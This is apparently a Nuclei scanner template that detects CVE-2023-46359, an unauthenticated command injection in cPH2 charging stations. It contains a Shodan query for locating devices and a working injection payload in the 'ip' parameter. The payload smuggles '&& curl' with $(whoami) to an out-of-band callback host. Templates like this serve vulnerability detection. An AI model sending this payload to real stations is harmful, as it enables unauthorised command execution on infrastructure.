id: CVE-2023-46359 info: name: cPH2 Charging Station v1.87.0 - OS Command Injection author: mlec severity: critical description: | An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature. impact: | Unauthenticated attackers can exploit OS command injection through the connectivity check feature to execute arbitrary system commands and completely compromise cPH2 charging station installations. remediation: Fixed in version 2.0.0 reference: - https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/ - https://nvd.nist.gov/vuln/detail/CVE-2023-46359 - http://hardy.com - https://github.com/d4n-sec/d4n-sec.github.io - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-46359 cwe-id: CWE-78 epss-score: 0.80888 epss-percentile: 0.99578 cpe: cpe:2.3:h:hardy-barth:cph2_echarge:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: hardy-barth product: cph2_echarge shodan-query: html:"Salia PLCC" tags: cve2023,cve,salia-plcc,cph2,rce,hardy-barth,vuln http: - method: GET path: - "{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}" matchers-condition: and matchers: - type: word words: - "SUCCESS" - "127.0.0.1 && curl http://$(whoami).{{interactsh-url}}" condition: and - type: word part: interactsh_protocol words: - "dns" # digest: 4a0a004730450220636fc0e67c0cdb05b532ea3b4e356ca26497a644d9388f4e07c6690b2f94551d022100de267d8cf1b06e26e948cfb3087047268904fb93b5edba6ff1f03c451771279d:922c64590222798bb761d5b6d8e72950